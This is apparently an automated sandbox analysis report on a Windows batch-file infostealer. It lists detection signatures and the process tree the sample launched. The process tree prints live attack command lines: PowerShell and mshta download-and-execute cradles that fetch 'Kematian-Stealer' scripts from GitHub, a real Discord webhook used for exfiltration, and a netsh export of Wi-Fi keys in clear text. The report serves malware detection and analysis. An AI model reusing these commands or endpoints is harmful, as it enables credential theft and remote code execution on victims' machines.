Edit tour
Windows
Analysis Report
thegreatestexecutor.bat
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected PowerShell ScreenShot
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Drops script or batch files to the startup folder
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Rundll32 Execution Without Parameters
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: Wscript Shell Run In CommandLine
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 6592 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\thegr eatestexec utor.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - findstr.exe (PID: 5172 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \thegreate stexecutor .bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - powershell.exe (PID: 6660 cmdline:
powershell .exe -NoLo go -NoProf ile -Execu tionPolicy Bypass -C ommand "if ((gcim Win 32_Physica lMemory | measure -P roperty ca pacity -Su m).sum /1g b -lt 4) { spps -f -n 'cmd' -Er rorAction SilentlyCo ntinue;exi t 1}" MD5: 04029E121A0CFA5991749937DD22A1D9) - findstr.exe (PID: 7316 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \thegreate stexecutor .bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - findstr.exe (PID: 7336 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \thegreate stexecutor .bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - chcp.com (PID: 7352 cmdline:
chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32) - findstr.exe (PID: 7372 cmdline:
findstr /i "echo" "C :\Users\us er\Desktop \thegreate stexecutor .bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5) - powershell.exe (PID: 7388 cmdline:
powershell .exe -nop -c "Write- Host -NoNe wLine $nul l" MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7476 cmdline:
powershell .exe -nop -c "Write- Host -NoNe wLine $nul l" MD5: 04029E121A0CFA5991749937DD22A1D9) - rundll32.exe (PID: 7568 cmdline:
rundll32 MD5: EF3179D498793BF4234F708D3BE28633) - net.exe (PID: 7608 cmdline:
net sessio n MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7624 cmdline:
C:\Windows \system32\ net1 sessi on MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - mshta.exe (PID: 7640 cmdline:
mshta vbsc ript:close (createobj ect("wscri pt.shell") .run("powe rshell $Pr ogressPref erence = ' SilentlyCo ntinue';$t = Iwr -Ur i 'https:/ /raw.githu buserconte nt.com/Chi ldrenOfYah weh/Kemati an-Stealer /main/fron tend-src/m ain.ps1' - UseBasicPa rsing; $t -replace ' YOUR_WEBHO OK_HERE', 'https://d iscord.com /api/webho oks/124596 4468803076 146/sUQk99 W99wQnOZBf rCW8tRsn0T etpTuD0yNK 0N7xwUeiPn wMv6HDm9VY bCjVT-FA2z dw' | iex" ,0)) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7696 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $ProgressP reference = 'Silentl yContinue' ;$t = Iwr -Uri 'http s://raw.gi thubuserco ntent.com/ ChildrenOf Yahweh/Kem atian-Stea ler/main/f rontend-sr c/main.ps1 ' -UseBasi cParsing; $t -replac e 'YOUR_WE BHOOK_HERE ', 'https: //discord. com/api/we bhooks/124 5964468803 076146/sUQ k99W99wQnO ZBfrCW8tRs n0TetpTuD0 yNK0N7xwUe iPnwMv6HDm 9VYbCjVT-F A2zdw' | i ex MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7704 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WmiPrvSE.exe (PID: 8036 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - netsh.exe (PID: 3964 cmdline:
"C:\Window s\system32 \netsh.exe " wlan exp ort profil e folder=C :\Users\us er~1\AppDa ta\Local\T emp\wifi k ey=clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - powershell.exe (PID: 1920 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" I'E'X((New -Object Ne t.Webclien t)."DowNlo AdSTRiNg"( 'https://g ithub.com/ Somali-Dev s/Kematian -Stealer/r aw/main/fr ontend-src /webcam.ps 1')) MD5: 04029E121A0CFA5991749937DD22A1D9) - csc.exe (PID: 3020 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\bekown h2\bekownh 2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66) - cvtres.exe (PID: 1848 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user ~1\AppData \Local\Tem p\RESA945. tmp" "c:\U sers\user\ AppData\Lo cal\Temp\b ekownh2\CS CE31222C31 0BD40CB8ED 0AE4A3AB63 C88.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - powershell.exe (PID: 1888 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" I'E'X((New -Object Ne t.Webclien t)."DowNlo AdSTRiNg"( 'https://g ithub.com/ Somali-Dev s/Kematian -Stealer/r aw/main/fr ontend-src /kematian_ shellcode. ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
- svchost.exe (PID: 7764 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
MALWARE_Win_PWSH_PoshWiFiStealer | Detects PowerShell PoshWiFiStealer | ditekSHen |
|
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Bartlomiej Czyz, Relativity: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Source: | Author: Joe Security: |
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |